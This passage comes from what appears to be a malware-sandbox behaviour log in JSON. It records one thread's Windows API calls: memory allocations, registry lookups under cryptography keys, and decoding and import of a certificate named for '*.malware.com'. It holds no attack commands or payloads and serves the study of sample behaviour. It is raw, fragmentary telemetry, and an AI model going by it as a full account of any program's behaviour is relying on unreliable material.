$G9\\x93\\x9e\\xe30\\x12\\x04\\x101y\\xfeKW&\\xd8\\xdb*\\xaf=\\xf9X\\xc9k\\x970\\x12\\x04\\x10\\xc3Z\\x97\\xc8\\x0fh}\\xc3\\xc1\\x08\\xc6\\xa33\\x9bhF0\\x12\\x04\\x10!\\x18\\xa4\\xc6\\xf7\\x18\\xcf\\xc7\\xd6\\xd8x\\x8cSt\\xd3)0\\x12\\x04\\x10Rj9\\xc0M\\x15\\x86-B\\x7f\\xd9%\\xaf\\x036\\x900\\x12\\x04\\x10<6\\xe1h\\xab\\xcc\\x85\\x96c\\xedG\\xa0\\xc0Z\\xeey0\\x12\\x04\\x10\\x01\\x9e}V\\xd6\r\\xb9\\xad\\xec@\\xb9g\\xb1\\xbc\\xba\\x9f0\\x12\\x04\\x106\\xcd\\xe9\\x9a\\xb8s\\x7f\\x86(|X7\\x04\\xc9^\\x160\\x12\\x04\\x10&\\x99\nwX~\\xd8d\\x01\\x84\\xc4\\x93f\\xac\\xb0u0\\x12\\x04\\x10\\xf6\\x9d\"\\xae\\x1e\\xd6\\x15\\xb1\\xb9\\xe3\\x90\\xe3\\x10\\xbb\\xbb10\\x12\\x04\\x10\\xeb\\xe9\n\\xd1\\x01\\xd3\\x80+\\x8aL\\x91<\\xac\\xeejW0\\x12\\x04\\x10\\x1e%\\xf2N\\xdf" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertEncodedCtl" + } + ], + "repeated": 0, + "id": 2489 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x76800725", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x048D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00A\\x00u\\x00t\\x00o\\x00U\\x00p\\x00d\\x00a\\x00t\\x00e\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xdbFv^\\xc4\\xfa\\xd2\\x17\r241204180014Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x00\\x00\\x00" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 2490 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00571000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2491 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00572000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2492 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00573000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2493 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "AutoFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags" + } + ], + "repeated": 0, + "id": 2494 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00575000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2495 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00578000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2496 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "DisableAutoFlushProcessNameList" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList" + } + ], + "repeated": 0, + "id": 2497 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "AutoFlushFirstDeltaSeconds" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds" + } + ], + "repeated": 0, + "id": 2498 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000508" + }, + { + "name": "ValueName", + "value": "AutoFlushNextDeltaSeconds" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds" + } + ], + "repeated": 0, + "id": 2499 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767ed925", + "parentcaller": "0x767ed8d8", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 2500 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767f1f05", + "parentcaller": "0x767f569f", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\x9b0\\x82\\x02\\x83\\xa0\\x03\\x02\\x01\\x02\\x02\\x14oO$OK\\xe4\\xebi\\x92\\x80\\x88\\xd4\\xa1\\xbb)\\x80\\xaf\\xf1\\xf5\\xcf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000]1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x0c\nSome-State1!0\\x1f\\x06\\x03U\\x04\n\\x0c\\x18Internet Widgits Pty Ltd1\\x160\\x14\\x06\\x03U\\x04\\x03\\x0c\r*.malware.com0\\x1e\\x17\r200513125616Z\\x17\r300511125616Z0]1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x0c\nSome-State1!0\\x1f\\x06\\x03U\\x04\n\\x0c\\x18Internet Widgits Pty Ltd1\\x160\\x14\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2501 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680c981", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x03\\x01\\x01\\xff" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2502 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7680cb46", + "parentcaller": "0x7680ca1c", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00010001" + }, + { + "name": "Encoded", + "value": "0\\x16\\x80\\x14\\x03\\x88\\x86\\x19\\xa6t\\xeb\\xbb\\x85\\xb0\\x1cQ\\x96$q;C\\x99\\x9a\\xe1" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 2503 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767fcffb", + "parentcaller": "0x767eb471", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\x9b0\\x82\\x02\\x83\\xa0\\x03\\x02\\x01\\x02\\x02\\x14oO$OK\\xe4\\xebi\\x92\\x80\\x88\\xd4\\xa1\\xbb)\\x80\\xaf\\xf1\\xf5\\xcf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000]1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x0c\nSome-State1!0\\x1f\\x06\\x03U\\x04\n\\x0c\\x18Internet Widgits Pty Ltd1\\x160\\x14\\x06\\x03U\\x04\\x03\\x0c\r*.malware.com0\\x1e\\x17\r200513125616Z\\x17\r300511125616Z0]1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x0c\nSome-State1!0\\x1f\\x06\\x03U\\x04\n\\x0c\\x18Internet Widgits Pty Ltd1\\x160\\x14\\x06\\x03U\\x04" + }, + { + "name": "Flags", + "value": "0x0000800d" + } + ], + "repeated": 0, + "id": 2504 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2505 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Cryptography\\OID" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" + } + ], + "repeated": 0, + "id": 2506 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2507 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000698" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000059c" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 0" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0" + } + ], + "repeated": 0, + "id": 2508 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000698" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllImportPublicKeyInfoEx" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllImportPublicKeyInfoEx" + } + ], + "repeated": 0, + "id": 2509 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2510 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000698" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000059c" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1" + } + ], + "repeated": 0, + "id": 2511 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000698" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllImportPublicKeyInfoEx" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CryptDllImportPublicKeyInfoEx" + } + ], + "repeated": 0, + "id": 2512 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": false, + "return": "0xffffffff8000001a", + "pretty_return": "NO_MORE_ENTRIES", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2513 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2514 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Cryptography\\OID" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" + } + ], + "repeated": 0, + "id": 2515 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2516 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000698" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000059c" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 0" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0" + } + ], + "repeated": 0, + "id": 2517 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000698" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllConvertPublicKeyInfo" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllConvertPublicKeyInfo" + } + ], + "repeated": 0, + "id": 2518 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2519 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000698" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000059c" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1" + } + ], + "repeated": 0, + "id": 2520 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000698" + }, + { + "name": "ObjectAttributesName", + "value": "CryptDllConvertPublicKeyInfo" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CryptDllConvertPublicKeyInfo" + } + ], + "repeated": 0, + "id": 2521 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": false, + "return": "0xffffffff8000001a", + "pretty_return": "NO_MORE_ENTRIES", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2522 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76801e39", + "parentcaller": "0x76801dfb", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\n\\x02\\x82\\x01\\x01\\x00\\xc8^\\x18^\\xd4\\xe4\\\\xdc\\xe0fBtQ\\xb4\\x96\\x10\tS\\x8aW.L\\x95\\x95\\x90\\x1b,}\\x8d\\xfc\\xc3y\\xffi\\xb6\\x06\\x16\\x84\\xbb\\xaa5\\xcc\\xe4\\xe2\\xf7+\\xce\n\\xed\\xac?\\x9f\\xf3S\\x98\\xca\\x97\\xc5\\xfbr\\xee(\\x95\\xea\\x16Cz\\x07t\\xc7\\x06;\\xdb\\x0b\\xd3\\xb5\\xa4LM\\xcb\\x83q\\x13]H\\x93(\\xab6\\x94f\\xa9\\x0bm\\x05\\x97:E\\xa6\\x03\\xaaR\\xdb\\xbfs\\xfe\\x1cX\\xb5:UzH\\xfc\\xb1dx\\x08\\xa1\\xfcST\\xf8\\xba\\x81AcJ6l\\xc7k\\x1a\\xffX<\\x0e\\x90\\xde\\x9eM9>N\\xb6F\\xae\\xb3a+\\x1a\\xbe\\x84\\xff\\x98@\\xc78\\xd1H\\xa1\\xa1\\xc7\\xd5+\\xb0\\xe4\\xdb\\xafT\\x87;[\\x01\\x04\\xd4\\xe6\\xc6va\\x02#\\xbe(\\xf6Nr\\x87\\x04{\\xfa^OIq\\xda\\xa5\\x8bB\\xc0\\xe4\\xa9\\xf8\\x11Q\\xfb\\x01ufg\\xfc\\xbf9\\xeb(#t\\x90\\xa8KCe\\xd5\\x95\\xc3R\\x16\\x15\\x99\n\\x94\\x9d\\x8a\\x19\\xa1\\x88\\xca\t\\x9f\\x02b&[\\x16<\\xca\\xd0" + }, + { + "name": "Flags", + "value": "0x00008000" + } + ], + "repeated": 0, + "id": 2523 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76801d87", + "parentcaller": "0x76812a6d", + "category": "crypto", + "api": "CryptImportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "KeyBlob", + "value": "\\x06\\x02\\x00\\x00\\x00\\xa4\\x00\\x00RSA1\\x00\\x08\\x00\\x00\\x01\\x00\\x01\\x00\\x89-Z\\x82\\xacF\\xc9\\x88\\x82\\xd0\\xca<\\x16[&b\\x02\\x9f\t\\xca\\x88\\xa1\\x19\\x8a\\x9d\\x94\n\\x99\\x15\\x16R\\xc3\\x95\\xd5eCK\\xa8\\x90t#(\\xeb9\\xbf\\xfcgfu\\x01\\xfbQ\\x11\\xf8\\xa9\\xe4\\xc0B\\x8b\\xa5\\xdaqIO^\\xfa{\\x04\\x87rN\\xf6(\\xbe#\\x02av\\xc6\\xe6\\xd4\\x04\\x01[;\\x87T\\xaf\\xdb\\xe4\\xb0+\\xd5\\xc7\\xa1\\xa1H\\xd18\\xc7@\\x98\\xff\\x84\\xbe\\x1a+a\\xb3\\xaeF\\xb6N>9M\\x9e\\xde\\x90\\x0eN\\xb6F\\xae\\xb3a+\\x1a\\xbe\\x84\\xff\\x98@\\xc78\\xd1H\\xa1\\xa1\\xc7\\xd5+\\xb0\\xe4\\xdb\\xafT\\x87;[\\x01\\x04\\xd4\\xe6\\xc6va\\x02#\\xbe(\\xf6Nr\\x87\\x04{\\xfa^OIq\\xda\\xa5\\x8bB\\xc0\\xe4\\xa9\\xf8\\x11Q\\xfb\\x01ufg\\xfc\\xbf9\\xeb(#t\\x90\\xa8KCe\\xd5\\x95\\xc3R\\x16\\x15\\x99\n\\x94\\x9d\\x8a\\x19\\xa1\\x88\\xca\t\\x9f\\x02b&[\\x16<\\xca\\xd0\\x82\\x88\\xc9F\\xac\\x82Z-\\x89\\x02\\x03\\x01\\x00\\x01\\xa3S0Q0\\x1d\\x06\\x03U\\x1d\\x0e\\x04\\x16\\x04\\x14\\x03\\x88\\x86\\x19\\xa6t\\xeb\\xbb\\x85\\xb0\\x1cQ\\x96$q;C\\x99\\x9a\\xe10\\x1f\\x06\\x03U\\x1d#\\x04\\x180\\x16\\x80\\x14\\x03\\x88\\x86\\x19\\xa6t\\xeb\\xbb\\x85\\xb0\\x1cQ\\x96$q;C\\x99\\x9a\\xe10\\x0f\\x06\\x03U\\x1d\\x13\\x01\\x01\\xff\\x04\\x050\\x03\\x01\\x01\\xff" + }, + { + "name": "Length", + "value": "647" + } + ], + "repeated": 0, + "id": 2526 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0057b000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2527 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2528 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 2529 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2530 